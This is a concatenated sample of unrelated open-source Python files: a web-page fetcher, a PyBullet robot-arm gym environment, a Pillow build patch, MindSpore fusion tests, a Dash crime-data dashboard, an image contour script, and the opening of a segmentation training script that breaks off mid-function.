cptk/core/fetcher.py | RealA10N/cptk | 5 | 7884 | <filename>cptk/core/fetcher.py
from __future__ import annotations
from typing import TYPE_CHECKING
import pkg_resources
from bs4 import BeautifulSoup
from requests import session
from cptk.scrape import PageInfo
from cptk.scrape import Website
from cptk.utils import cptkException
if TYPE_CHECKING:
from cptk.scrape import Problem
class InvalidClone(cptkException):
""" Raised when the clone command is called with a 'PageInfo' instance that
doesn't describe anything that can be cloned. """
def __init__(self, info: PageInfo) -> None:
self.info = info
super().__init__(f"We don't know how to handle data from {info.url!r}")
class UnknownWebsite(cptkException):
""" Raised when trying to fetch information from a website that is not
    registered and can't be handled by cptk. """
def __init__(self, domain: str) -> None:
self.domain = domain
super().__init__(f"We don't know how to handle data from {domain!r}")
class Fetcher:
def __init__(self) -> None:
self.session = session()
self._load_websites()
def _load_websites(self) -> list[type[Website]]:
self._websites = [
point.load()()
for point in pkg_resources.iter_entry_points('cptk_sites')
]
self._domain_to_website = dict()
for website in self._websites:
domain = website.domain
if isinstance(domain, str):
self._domain_to_website[domain] = website
else:
for cur in domain:
self._domain_to_website[cur] = website
def page_to_problem(self, info: PageInfo) -> Problem:
""" Recives an arbitrary page info instance and tries to match it with
a Website class that knows how to handle this specific website. If cptk
doesn't find a way to parse the given webpage, it raises the
'InvalidClone' exception. """
for website in self._websites:
if website.is_problem(info):
return website.to_problem(info)
raise InvalidClone(info)
def to_page(self, url: str) -> PageInfo:
""" Makes an get http/s request to the given URL and returns the result
as a PageInfo instance. """
if not url.startswith('http'):
url = f'http://{url}'
res = self.session.get(url)
data = BeautifulSoup(res.content, 'lxml')
return PageInfo(url, data)
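# Usage sketch (the URL is an assumption, not from the original module):
# fetcher = Fetcher()
# info = fetcher.to_page('https://example.com/some/problem')
# problem = fetcher.page_to_problem(info)   # raises InvalidClone if unsupported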
| 2.75 | 3 |
machine_learning/deep_reinforcement_learning_grasping/drlgrasp/drlgrasp/pybullet_envs/kuka_reach_with_visual.py | Hinson-A/guyueclass | 227 | 7885 | import pybullet as p
import pybullet_data
import gym
from gym import spaces
from gym.utils import seeding
import numpy as np
from math import sqrt
import random
import time
import math
import cv2
import torch
import os
def random_crop(imgs, out):
"""
args:
imgs: shape (B,C,H,W)
out: output size (e.g. 84)
"""
n, c, h, w = imgs.shape
crop_max = h - out + 1
w1 = np.random.randint(0, crop_max, n)
h1 = np.random.randint(0, crop_max, n)
cropped = np.empty((n, c, out, out), dtype=imgs.dtype)
for i, (img, w11, h11) in enumerate(zip(imgs, w1, h1)):
cropped[i] = img[:, h11:h11 + out, w11:w11 + out]
return cropped
class KukaReachVisualEnv(gym.Env):
metadata = {
'render.modes': ['human', 'rgb_array'],
'video.frames_per_second': 50
}
kMaxEpisodeSteps = 700
kImageSize = {'width': 96, 'height': 96}
kFinalImageSize = {'width': 84, 'height': 84}
def __init__(self, is_render=False, is_good_view=False):
self.is_render = is_render
self.is_good_view = is_good_view
if self.is_render:
p.connect(p.GUI)
else:
p.connect(p.DIRECT)
self.x_low_obs = 0.2
self.x_high_obs = 0.7
self.y_low_obs = -0.3
self.y_high_obs = 0.3
self.z_low_obs = 0
self.z_high_obs = 0.55
self.x_low_action = -0.4
self.x_high_action = 0.4
self.y_low_action = -0.4
self.y_high_action = 0.4
self.z_low_action = -0.6
self.z_high_action = 0.3
self.step_counter = 0
self.urdf_root_path = pybullet_data.getDataPath()
# lower limits for null space
self.lower_limits = [-.967, -2, -2.96, 0.19, -2.96, -2.09, -3.05]
# upper limits for null space
self.upper_limits = [.967, 2, 2.96, 2.29, 2.96, 2.09, 3.05]
# joint ranges for null space
self.joint_ranges = [5.8, 4, 5.8, 4, 5.8, 4, 6]
# restposes for null space
self.rest_poses = [0, 0, 0, 0.5 * math.pi, 0, -math.pi * 0.5 * 0.66, 0]
# joint damping coefficents
self.joint_damping = [
0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001
]
self.init_joint_positions = [
0.006418, 0.413184, -0.011401, -1.589317, 0.005379, 1.137684,
-0.006539
]
self.orientation = p.getQuaternionFromEuler(
[0., -math.pi, math.pi / 2.])
self.camera_parameters = {
'width': 960.,
'height': 720,
'fov': 60,
'near': 0.1,
'far': 100.,
'eye_position': [0.59, 0, 0.8],
'target_position': [0.55, 0, 0.05],
'camera_up_vector':
[1, 0, 0], # I really do not know the parameter's effect.
'light_direction': [
0.5, 0, 1
], # the direction is from the light source position to the origin of the world frame.
}
self.view_matrix = p.computeViewMatrixFromYawPitchRoll(
cameraTargetPosition=[0.55, 0, 0.05],
distance=.7,
yaw=90,
pitch=-70,
roll=0,
upAxisIndex=2)
self.projection_matrix = p.computeProjectionMatrixFOV(
fov=self.camera_parameters['fov'],
aspect=self.camera_parameters['width'] /
self.camera_parameters['height'],
nearVal=self.camera_parameters['near'],
farVal=self.camera_parameters['far'])
p.configureDebugVisualizer(lightPosition=[5, 0, 5])
p.resetDebugVisualizerCamera(cameraDistance=1.5,
cameraYaw=0,
cameraPitch=-40,
cameraTargetPosition=[0.55, -0.35, 0.2])
self.action_space = spaces.Box(low=np.array(
[self.x_low_action, self.y_low_action, self.z_low_action]),
high=np.array([
self.x_high_action,
self.y_high_action,
self.z_high_action
]),
dtype=np.float32)
self.observation_space = spaces.Box(low=0, high=1,
shape=(1, self.kFinalImageSize['width'], self.kFinalImageSize['height']))
self.seed()
self.reset()
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def reset(self):
self.step_counter = 0
p.resetSimulation()
# p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 0)
self.terminated = False
p.setGravity(0, 0, -10)
        # These are the white boundary lines around the workspace, used to check whether the arm leaves the observation-space limits
p.addUserDebugLine(
lineFromXYZ=[self.x_low_obs, self.y_low_obs, 0],
lineToXYZ=[self.x_low_obs, self.y_low_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_low_obs, self.y_high_obs, 0],
lineToXYZ=[self.x_low_obs, self.y_high_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_high_obs, self.y_low_obs, 0],
lineToXYZ=[self.x_high_obs, self.y_low_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_high_obs, self.y_high_obs, 0],
lineToXYZ=[self.x_high_obs, self.y_high_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_low_obs, self.y_low_obs, self.z_high_obs],
lineToXYZ=[self.x_high_obs, self.y_low_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_low_obs, self.y_high_obs, self.z_high_obs],
lineToXYZ=[self.x_high_obs, self.y_high_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_low_obs, self.y_low_obs, self.z_high_obs],
lineToXYZ=[self.x_low_obs, self.y_high_obs, self.z_high_obs])
p.addUserDebugLine(
lineFromXYZ=[self.x_high_obs, self.y_low_obs, self.z_high_obs],
lineToXYZ=[self.x_high_obs, self.y_high_obs, self.z_high_obs])
p.loadURDF(os.path.join(self.urdf_root_path, "plane.urdf"),
basePosition=[0, 0, -0.65])
self.kuka_id = p.loadURDF(os.path.join(self.urdf_root_path,
"kuka_iiwa/model.urdf"),
useFixedBase=True)
table_uid = p.loadURDF(os.path.join(self.urdf_root_path,
"table/table.urdf"),
basePosition=[0.5, 0, -0.65])
p.changeVisualShape(table_uid, -1, rgbaColor=[1, 1, 1, 1])
self.object_id = p.loadURDF(os.path.join(self.urdf_root_path,
"random_urdfs/000/000.urdf"),
basePosition=[
random.uniform(self.x_low_obs,
self.x_high_obs),
random.uniform(self.y_low_obs,
self.y_high_obs), 0.01
])
self.num_joints = p.getNumJoints(self.kuka_id)
for i in range(self.num_joints):
p.resetJointState(
bodyUniqueId=self.kuka_id,
jointIndex=i,
targetValue=self.init_joint_positions[i],
)
self.robot_pos_obs = p.getLinkState(self.kuka_id,
self.num_joints - 1)[4]
p.stepSimulation()
(_, _, px, _,
_) = p.getCameraImage(width=960,
height=960,
viewMatrix=self.view_matrix,
projectionMatrix=self.projection_matrix,
renderer=p.ER_BULLET_HARDWARE_OPENGL)
self.images = px
p.enableJointForceTorqueSensor(bodyUniqueId=self.kuka_id,
jointIndex=self.num_joints - 1,
enableSensor=True)
self.object_pos = p.getBasePositionAndOrientation(self.object_id)[0]
self.images = self.images[:, :, :
3] # the 4th channel is alpha channel, we do not need it.
return self._process_image(self.images)
def _process_image(self, image):
"""Convert the RGB pic to gray pic and add a channel 1
Args:
image ([type]): [description]
"""
if image is not None:
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
image = cv2.resize(image, (self.kImageSize['width'], self.kImageSize['height']))[None, :, :] / 255.
return image
else:
return np.zeros((1, self.kImageSize['width'], self.kImageSize['height']))
def step(self, action):
dv = 0.005
dx = action[0] * dv
dy = action[1] * dv
dz = action[2] * dv
self.current_pos = p.getLinkState(self.kuka_id, self.num_joints - 1)[4]
self.new_robot_pos = [
self.current_pos[0] + dx, self.current_pos[1] + dy,
self.current_pos[2] + dz
]
self.robot_joint_positions = p.calculateInverseKinematics(
bodyUniqueId=self.kuka_id,
endEffectorLinkIndex=self.num_joints - 1,
targetPosition=[
self.new_robot_pos[0], self.new_robot_pos[1],
self.new_robot_pos[2]
],
targetOrientation=self.orientation,
jointDamping=self.joint_damping,
)
for i in range(self.num_joints):
p.resetJointState(
bodyUniqueId=self.kuka_id,
jointIndex=i,
targetValue=self.robot_joint_positions[i],
)
p.stepSimulation()
        # If is_good_view was set in the constructor, slow the arm down so its motion is easier to observe
if self.is_good_view:
time.sleep(0.05)
self.step_counter += 1
return self._reward()
def _reward(self):
        # Note that we take the 4th element; see the pybullet manual for this function's return values
self.robot_state = p.getLinkState(self.kuka_id, self.num_joints - 1)[4]
self.object_state = np.array(
p.getBasePositionAndOrientation(self.object_id)[0]).astype(
np.float32)
square_dx = (self.robot_state[0] - self.object_state[0]) ** 2
square_dy = (self.robot_state[1] - self.object_state[1]) ** 2
square_dz = (self.robot_state[2] - self.object_state[2]) ** 2
        # Use the distance between the end effector and the object as the basis for the reward
self.distance = sqrt(square_dx + square_dy + square_dz)
# print(self.distance)
x = self.robot_state[0]
y = self.robot_state[1]
z = self.robot_state[2]
        # If the end effector leaves the observation space, the episode is also done and a small penalty is given
terminated = bool(x < self.x_low_obs or x > self.x_high_obs
or y < self.y_low_obs or y > self.y_high_obs
or z < self.z_low_obs or z > self.z_high_obs)
if terminated:
reward = -0.1
self.terminated = True
        # If the arm idles and cannot reach the object within the maximum number of steps, a penalty is also given
elif self.step_counter > self.kMaxEpisodeSteps:
reward = -0.1
self.terminated = True
elif self.distance < 0.1:
reward = 1
self.terminated = True
else:
reward = 0
self.terminated = False
        info = {'distance': self.distance}
(_, _, px, _,
_) = p.getCameraImage(width=960,
height=960,
viewMatrix=self.view_matrix,
projectionMatrix=self.projection_matrix,
renderer=p.ER_BULLET_HARDWARE_OPENGL)
self.images = px
self.processed_image = self._process_image(self.images)
# self.observation=self.robot_state
self.observation = self.object_state
return self.processed_image, reward, self.terminated, info
def close(self):
p.disconnect()
def _get_force_sensor_value(self):
force_sensor_value = p.getJointState(bodyUniqueId=self.kuka_id,
jointIndex=self.num_joints -
1)[2][2]
        # the first [2] selects jointReactionForces, the second [2] selects Fz.
        # pybullet returns a tuple, so it cannot be indexed with a string like a dict;
        # it would be nicer if the return value were a dict instead of a tuple.
return force_sensor_value
class CustomSkipFrame(gym.Wrapper):
""" Make a 4 frame skip, so the observation space will change to (4,84,84) from (1,84,84)
Args:
gym ([type]): [description]
"""
def __init__(self, env, skip=4):
super(CustomSkipFrame, self).__init__(env)
self.observation_space = spaces.Box(low=0,
high=1,
shape=(skip, self.kFinalImageSize['width'], self.kFinalImageSize['height']))
self.skip = skip
def step(self, action):
total_reward = 0
states = []
        state, reward, done, info = self.env.step(action)
        total_reward += reward
        for i in range(self.skip):
            if not done:
                state, reward, done, info = self.env.step(action)
                total_reward += reward
                states.append(state)
            else:
                states.append(state)
        states = np.concatenate(states, 0)[None, :, :, :]
        # return the reward accumulated over the skipped frames, not just the last one
        return random_crop(states.astype(np.float32), self.kFinalImageSize['width']), total_reward, done, info
def reset(self):
state = self.env.reset()
states = np.concatenate([state for _ in range(self.skip)],
0)[None, :, :, :]
return random_crop(states.astype(np.float32), self.kFinalImageSize['width'])
if __name__ == '__main__':
    # This part builds a baseline: let the arm pick random actions and see what score it can get
import matplotlib.pyplot as plt
env = KukaReachVisualEnv(is_render=False)
env = CustomSkipFrame(env)
print(env.observation_space.shape)
print(env.action_space.shape)
print(env.action_space.n)
# for _ in range(20):
# action=env.action_space.sample()
# print(action)
# env.step(action)
#
# state = env.reset()
# print(state.shape)
# img = state[0][0]
# plt.imshow(img, cmap='gray')
# plt.show()
| 2.328125 | 2 |
bucket_4C/python-Pillow/patches/patch-setup.py | jrmarino/ravensource | 17 | 7886 | <reponame>jrmarino/ravensource
--- setup.py.orig 2019-07-02 19:13:39 UTC
+++ setup.py
@@ -465,9 +465,7 @@ class pil_build_ext(build_ext):
_add_directory(include_dirs, "/usr/X11/include")
elif (
- sys.platform.startswith("linux")
- or sys.platform.startswith("gnu")
- or sys.platform.startswith("freebsd")
+ sys.platform.startswith("nothing")
):
for dirname in _find_library_dirs_ldconfig():
_add_directory(library_dirs, dirname)
| 1.382813 | 1 |
tests/ut/cpp/python_input/gtest_input/pre_activate/ir_fusion_test.py | GeekHee/mindspore | 0 | 7887 | <reponame>GeekHee/mindspore
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
from mindspore.ops import Primitive
from mindspore.ops import operations as P
from mindspore.ops.operations import _grad_ops as G
from mindspore.ops import _constants as Constants
# pylint: disable=unused-variable
tuple_getitem = Primitive(Constants.kTupleGetItem)
add = P.Add()
allreduce = P.AllReduce()
allreduce.add_prim_attr('fusion', 1)
make_tuple = Primitive("make_tuple")
conv = P.Conv2D(out_channel=64, kernel_size=7, mode=1, pad_mode="valid", pad=0, stride=1, dilation=1, group=1)
bn = P.FusedBatchNorm()
relu = P.ReLU()
conv_bn1 = Primitive('ConvBN1')
bn2_add_relu = Primitive('BN2AddRelu')
bn2_relu = Primitive('BN2Relu')
fused_bn1 = Primitive('FusedBN1')
fused_bn2 = Primitive('FusedBN2')
fused_bn3 = Primitive('FusedBN3')
bn_grad = G.FusedBatchNormGrad()
bn_grad1 = Primitive('BNGrad1')
bn_grad2 = Primitive('BNGrad2')
bn_grad3 = Primitive('BNGrad3')
class FnDict:
def __init__(self):
self.fnDict = {}
def __call__(self, fn):
self.fnDict[fn.__name__] = fn
def __getitem__(self, name):
return self.fnDict[name]
def test_bn_split(tag):
""" test_split_bn_fusion """
fns = FnDict()
@fns
def before(x, scale, b, mean, variance):
bn_output = bn(x, scale, b, mean, variance)
item0 = tuple_getitem(bn_output, 0)
return item0
@fns
def after(x, scale, b, mean, variance):
fused_bn1_output = fused_bn1(x)
fused_bn2_input0 = tuple_getitem(fused_bn1_output, 0)
fused_bn2_input1 = tuple_getitem(fused_bn1_output, 1)
fused_bn2_output = fused_bn2(fused_bn2_input0, fused_bn2_input1, mean, variance)
fused_bn3_input1 = tuple_getitem(fused_bn2_output, 0)
fused_bn3_input2 = tuple_getitem(fused_bn2_output, 1)
fused_bn3_output = fused_bn3(x, fused_bn3_input1, fused_bn3_input2, scale, b)
output1 = tuple_getitem(fused_bn2_output, 2)
output2 = tuple_getitem(fused_bn2_output, 3)
output3 = tuple_getitem(fused_bn2_output, 0)
output4 = tuple_getitem(fused_bn2_output, 1)
output = make_tuple(fused_bn3_output, output1, output2, output3, output4)
item0 = tuple_getitem(output, 0)
return make_tuple(item0)
return fns[tag]
def test_bn_grad_split(tag):
""" test_bn_grad_split """
fns = FnDict()
@fns
def before(dy, x, scale, save_mean, save_inv_variance):
bn_grad_output = bn_grad(dy, x, scale, save_mean, save_inv_variance)
item0 = tuple_getitem(bn_grad_output, 0)
item1 = tuple_getitem(bn_grad_output, 1)
item2 = tuple_getitem(bn_grad_output, 2)
output = make_tuple(item0, item1, item2)
res = tuple_getitem(output, 0)
return res
@fns
def after(i0, i1, i2, i3, i4):
bn_grad1_output = bn_grad1(i0, i1, i3)
bn_grad1_item0 = tuple_getitem(bn_grad1_output, 0)
bn_grad1_item1 = tuple_getitem(bn_grad1_output, 1)
bn_grad1_item2 = tuple_getitem(bn_grad1_output, 2)
bn_grad2_output = bn_grad2(bn_grad1_item0, bn_grad1_item1, i4, i2)
bn_grad2_item0 = tuple_getitem(bn_grad2_output, 0)
bn_grad2_item1 = tuple_getitem(bn_grad2_output, 1)
bn_grad2_item2 = tuple_getitem(bn_grad2_output, 2)
bn_grad2_item3 = tuple_getitem(bn_grad2_output, 3)
bn_grad2_item4 = tuple_getitem(bn_grad2_output, 4)
bn_grad3_output = bn_grad3(i0, bn_grad2_item2, bn_grad2_item3, bn_grad2_item4, bn_grad1_item2)
bn_grad_make_tuple = make_tuple(bn_grad3_output, bn_grad2_item0, bn_grad2_item1)
item0 = tuple_getitem(bn_grad_make_tuple, 0)
item1 = tuple_getitem(bn_grad_make_tuple, 1)
item2 = tuple_getitem(bn_grad_make_tuple, 2)
output = make_tuple(item0, item1, item2)
return make_tuple(tuple_getitem(output, 0))
return fns[tag]
def test_all_reduce_fusion_all(tag):
""" test_all_reduce_fusion_all """
fns = FnDict()
@fns
def before(x1, x2, x3, x4, x5):
y1 = allreduce(x1)
y2 = allreduce(x2)
y3 = allreduce(x3)
y4 = allreduce(x4)
y5 = allreduce(x5)
return make_tuple(y1, y2, y3, y4, y5)
@fns
def after(x1, x2, x3, x4, x5):
ar = allreduce(x5, x4, x3, x2, x1)
y5 = tuple_getitem(ar, 0)
y4 = tuple_getitem(ar, 1)
y3 = tuple_getitem(ar, 2)
y2 = tuple_getitem(ar, 3)
y1 = tuple_getitem(ar, 4)
res = make_tuple(y1, y2, y3, y4, y5)
return make_tuple(res)
@fns
def after1(x1, x2, x3, x4, x5):
ar = allreduce(x1, x2, x3, x4, x5)
y1 = tuple_getitem(ar, 0)
y2 = tuple_getitem(ar, 1)
y3 = tuple_getitem(ar, 2)
y4 = tuple_getitem(ar, 3)
y5 = tuple_getitem(ar, 4)
res = make_tuple(y1, y2, y3, y4, y5)
return make_tuple(res)
return fns[tag]
def test_all_reduce_fusion_group(tag):
""" test_all_reduce_fusion_group """
fns = FnDict()
@fns
def before(x1, x2, x3, x4, x5):
y1 = allreduce(x1)
y2 = allreduce(x2)
y3 = allreduce(x3)
y4 = allreduce(x4)
y5 = allreduce(x5)
return make_tuple(y1, y2, y3, y4, y5)
@fns
def after1(x1, x2, x3, x4, x5):
ar1 = allreduce(x5, x4)
ar2 = allreduce(x3, x2, x1)
y4 = tuple_getitem(ar1, 1)
y5 = tuple_getitem(ar1, 0)
y1 = tuple_getitem(ar2, 2)
y2 = tuple_getitem(ar2, 1)
y3 = tuple_getitem(ar2, 0)
res = make_tuple(y1, y2, y3, y4, y5)
return make_tuple(res)
@fns
def after2(x1, x2, x3, x4, x5):
ar1 = allreduce(x1, x3, x5)
ar2 = allreduce(x2, x4)
y1 = tuple_getitem(ar1, 2)
y3 = tuple_getitem(ar1, 1)
y5 = tuple_getitem(ar1, 0)
y2 = tuple_getitem(ar2, 1)
y4 = tuple_getitem(ar2, 0)
output = make_tuple(y1, y2, y3, y4, y5)
return make_tuple(output)
return fns[tag]
| 1.703125 | 2 |
tdx/abc.py | TrainerDex/DiscordBot | 2 | 7888 | <reponame>TrainerDex/DiscordBot
from abc import ABC
from typing import Dict
from redbot.core import Config
from redbot.core.bot import Red
from trainerdex.client import Client
class MixinMeta(ABC):
"""
Base class for well behaved type hint detection with composite class.
Basically, to keep developers sane when not all attributes are defined in each mixin.
"""
def __init__(self, *_args):
self.bot: Red
self.config: Config
self.client: Client
self.emoji: Dict
| 2.546875 | 3 |
app.py | PolinaRomanchenko/Victorious_Secret_DSCI_532 | 0 | 7889 | import dash
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
import pandas as pd
import numpy as np
import altair as alt
import vega_datasets
alt.data_transformers.enable('default')
alt.data_transformers.disable_max_rows()
app = dash.Dash(__name__, assets_folder='assets', external_stylesheets=[dbc.themes.BOOTSTRAP])
# Boostrap CSS.
app.css.append_css({'external_url': 'https://codepen.io/amyoshino/pen/jzXypZ.css'}) # noqa: E501
server = app.server
app.title = 'Dash app with pure Altair HTML'
df = pd.read_csv('data/Police_Department_Incidents_-_Previous_Year__2016_.csv')
# df = pd.read_csv("https://raw.github.ubc.ca/MDS-2019-20/DSCI_531_lab4_anas017/master/data/Police_Department_Incidents_-_Previous_Year__2016_.csv?token=<PASSWORD>%3D")
df['datetime'] = pd.to_datetime(df[["Date","Time"]].apply(lambda x: x[0].split()[0] +" "+x[1], axis=1), format="%m/%d/%Y %H:%M")
df['hour'] = df['datetime'].dt.hour
df.dropna(inplace=True)
top_4_crimes = df['Category'].value_counts()[:6].index.to_list()
top_4_crimes
top_4_crimes.remove("NON-CRIMINAL")
top_4_crimes.remove("OTHER OFFENSES")
# top 4 crimes df subset
df_t4 = df[df["Category"].isin(top_4_crimes)].copy()
def make_plot_top(df_new=df_t4):
# Create a plot of the Displacement and the Horsepower of the cars dataset
# making the slider
slider = alt.binding_range(min = 0, max = 23, step = 1)
select_hour = alt.selection_single(name='select', fields = ['hour'],
bind = slider, init={'hour': 0})
#begin of my code
# typeDict = {'ASSAULT':'quantitative',
# 'VANDALISM':'quantitative',
# 'LARCENY/THEFT':'quantitative',
# 'VEHICLE THEFT':'quantitative'
# }
# end
chart = alt.Chart(df_new).mark_bar(size=30).encode(
x=alt.X('Category',type='nominal', title='Category'),
y=alt.Y('count()', title = "Count" , scale = alt.Scale(domain = (0,3300))),
tooltip='count()'
).properties(
title = "Per hour crime occurrences for the top 4 crimes",
width=500,
height = 315
).add_selection(
select_hour
).transform_filter(
select_hour
)
return chart
def make_plot_bot(data=df_t4):
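    # Two side-by-side Altair views: a geographic scatter of incidents and a bar chart of report counts
    # per district, both filtered by a crime-category dropdown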
chart_1 = alt.Chart(data).mark_circle(size=3, opacity = 0.8).encode(
longitude='X:Q',
latitude='Y:Q',
color = alt.Color('PdDistrict:N', legend = alt.Legend(title = "District")),
tooltip = 'PdDistrict'
).project(
type='albersUsa'
).properties(
width=450,
height=350
)
chart_2 = alt.Chart(data).mark_bar().encode(
x=alt.X('PdDistrict:N', axis=None, title="District"),
y=alt.Y('count()', title="Count of reports"),
color=alt.Color('PdDistrict:N', legend=alt.Legend(title="District")),
tooltip=['PdDistrict', 'count()']
).properties(
width=450,
height=350
)
# A dropdown filter
crimes_dropdown = alt.binding_select(options=list(data['Category'].unique()))
crimes_select = alt.selection_single(fields=['Category'], bind=crimes_dropdown,
name="Pick\ Crime")
combine_chart = (chart_2 | chart_1)
filter_crimes = combine_chart.add_selection(
crimes_select
).transform_filter(
crimes_select
)
return filter_crimes
body = dbc.Container(
[
dbc.Row(
[
dbc.Col(
[
html.H2("San Francisco Crime"),
html.P(
"""\
When looking for a place to live or visit, one important factor that people will consider
is the safety of the neighborhood. Searching that information district
by district could be time consuming and exhausting. It is even more difficult to
compare specific crime statistics across districts such as the crime rate
at a certain time of day. It would be useful if people can look up crime
related information across district on one application. Our app
aims to help people make decisions when considering their next trip or move to San Francisco, California
via visually exploring a dataset of crime statistics. The app provides an overview of the crime rate across
neighborhoods and allows users to focus on more specific information through
filtering of geological location, crime rate, crime type or time of the
crime.
Use the box below to choose crimes of interest.
"""
),
dcc.Dropdown(
id = 'drop_selection_crime',
options=[{'label': i, 'value': i} for i in df_t4['Category'].unique()
],
style={'height': '20px',
'width': '400px'},
value=df_t4['Category'].unique(),
multi=True)
],
md=5,
),
dbc.Col(
[
dbc.Row(
[
html.Iframe(
sandbox = "allow-scripts",
id = "plot_top",
height = "500",
width = "650",
style = {"border-width": "0px"},
srcDoc = make_plot_top().to_html()
)
]
)
]
),
]
),
dbc.Row(
html.Iframe(
sandbox='allow-scripts',
id='plot_bot',
height='500',
width='1200',
style={'border-width': '0px'},
srcDoc= make_plot_bot().to_html()
)
)
],
className="mt-4",
)
app.layout = html.Div(body)
@app.callback([dash.dependencies.Output('plot_top', 'srcDoc'),
dash.dependencies.Output('plot_bot', 'srcDoc')],
[dash.dependencies.Input('drop_selection_crime', 'value')]
)
def update_df(chosen):
new_df = df_t4[(df_t4["Category"].isin(chosen))]
updated_plot_top = make_plot_top(new_df).to_html()
updated_plot_bottom = make_plot_bot(new_df).to_html()
return updated_plot_top, updated_plot_bottom
if __name__ == '__main__':
app.run_server(debug=False) | 2.4375 | 2 |
catkin_ws/src:/opt/ros/kinetic/lib/python2.7/dist-packages:/home/bala/duckietown/catkin_ws/src:/home/bala/duckietown/catkin_ws/src/lib/python2.7/site-packages/geometry/subspaces/__init__.py | johnson880319/Software | 0 | 7890 | <reponame>johnson880319/Software
# coding=utf-8
from .subspaces import *
| 0.898438 | 1 |
detection/contor.py | chika626/chainer_rep | 0 | 7891 | <reponame>chika626/chainer_rep
import json
import math
from PIL import Image,ImageDraw
import pandas as pd
import glob
import argparse
import copy
import numpy as np
import matplotlib.pyplot as plt
import pickle
import cv2
from PIL import ImageEnhance
import chainer
from chainer.datasets import ConcatenatedDataset
from chainer.datasets import TransformDataset
from chainer.optimizer_hooks import WeightDecay
from chainer import serializers
from chainer import training
from chainer.training import extensions
from chainer.training import triggers
from chainercv.datasets import voc_bbox_label_names
from chainercv.datasets import VOCBboxDataset
from chainercv.extensions import DetectionVOCEvaluator
from chainercv.links.model.ssd import GradientScaling
from chainercv.links.model.ssd import multibox_loss
from chainercv.links import SSD300
from chainercv.links import SSD512
from chainercv import transforms
from chainercv.utils import read_image
from chainercv.links.model.ssd import random_crop_with_bbox_constraints
from chainercv.links.model.ssd import random_distort
from chainercv.links.model.ssd import resize_with_random_interpolation
import queue
def run(img):
# c , H , W = img.shape
H,W = img.size
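    # PIL's Image.size is (width, height), so H holds the width and W the height;
    # the numpy array below is indexed as img[row][col], i.e. img[y][x]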
img = np.asarray(img)
    # output image holding the converted (edge) data
transed = Image.new('RGB',(H,W))
for x in range(H):
for y in range(W):
transed.putpixel((x,y),(255,255,255))
for x in range(H):
for y in range(W):
if x + 1 == H or y + 1 == W:
break
if img[y][x][0] != img[y][x+1][0]:
transed.putpixel((x,y),(0,0,0))
for y in range(W):
for x in range(H):
if x + 1 == H or y + 1 == W:
break
if img[y][x][0] != img[y+1][x][0]:
transed.putpixel((x,y),(0,0,0))
return transed
def main():
    # # Code for the single-image case
# img = Image.open('cont/transed/X.jpg')
# img=img.convert('L')
# img=np.asarray(img)
# ret2, img = cv2.threshold(img, 0, 255, cv2.THRESH_OTSU)
# img=Image.fromarray(img)
# img=img.convert('RGB')
# transed = run(img)
# transed.save('transec_0.png')
# return
    # Batch converter
img_path=glob.glob("cont/crop/*")
counter=0
for path in img_path:
img = Image.open(path)
transed = run(img)
transed.save('transec_{}.png'.format(counter))
counter+=1
if __name__ == '__main__':
main() | 2.140625 | 2 |
train.py | hjl-yul154/autodeeplab | 1 | 7892 | import os
import pdb
import warnings
import numpy as np
import torch
import torch.nn as nn
import torch.utils.data
import torch.backends.cudnn
import torch.optim as optim
import dataloaders
from utils.utils import AverageMeter
from utils.loss import build_criterion
from utils.metrics import Evaluator
from utils.step_lr_scheduler import Iter_LR_Scheduler
from retrain_model.build_autodeeplab import Retrain_Autodeeplab
from config_utils.re_train_autodeeplab import obtain_retrain_autodeeplab_args
def main():
warnings.filterwarnings('ignore')
assert torch.cuda.is_available()
torch.backends.cudnn.benchmark = True
args = obtain_retrain_autodeeplab_args()
save_dir = os.path.join('./data/', args.save_path)
if not os.path.isdir(save_dir):
os.mkdir(save_dir)
model_fname = os.path.join(save_dir,
'deeplab_{0}_{1}_v3_{2}_epoch%d.pth'.format(args.backbone, args.dataset, args.exp))
record_name = os.path.join(save_dir, 'training_record.txt')
if args.dataset == 'pascal':
raise NotImplementedError
elif args.dataset == 'cityscapes':
kwargs = {'num_workers': args.workers, 'pin_memory': True, 'drop_last': True}
dataset_loader, num_classes, val_loader = dataloaders.make_data_loader(args, **kwargs)
args.num_classes = num_classes
else:
raise ValueError('Unknown dataset: {}'.format(args.dataset))
if args.backbone == 'autodeeplab':
model = Retrain_Autodeeplab(args)
else:
raise ValueError('Unknown backbone: {}'.format(args.backbone))
if args.criterion == 'Ohem':
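        # OHEM loss settings (assumed semantics): thresh is the probability threshold and n_min a lower
        # bound on the number of pixels kept per batch (per-GPU batch size times crop area, divided by 16)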
args.thresh = 0.7
args.crop_size = [args.crop_size, args.crop_size] if isinstance(args.crop_size, int) else args.crop_size
args.n_min = int((args.batch_size / len(args.gpu) * args.crop_size[0] * args.crop_size[1]) // 16)
criterion = build_criterion(args)
model = nn.DataParallel(model).cuda()
model.train()
if args.freeze_bn:
for m in model.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
m.weight.requires_grad = False
m.bias.requires_grad = False
optimizer = optim.SGD(model.module.parameters(), lr=args.base_lr, momentum=0.9, weight_decay=0.0001)
max_iteration = len(dataset_loader) * args.epochs
scheduler = Iter_LR_Scheduler(args, max_iteration, len(dataset_loader))
start_epoch = 0
evaluator=Evaluator(num_classes)
if args.resume:
if os.path.isfile(args.resume):
print('=> loading checkpoint {0}'.format(args.resume))
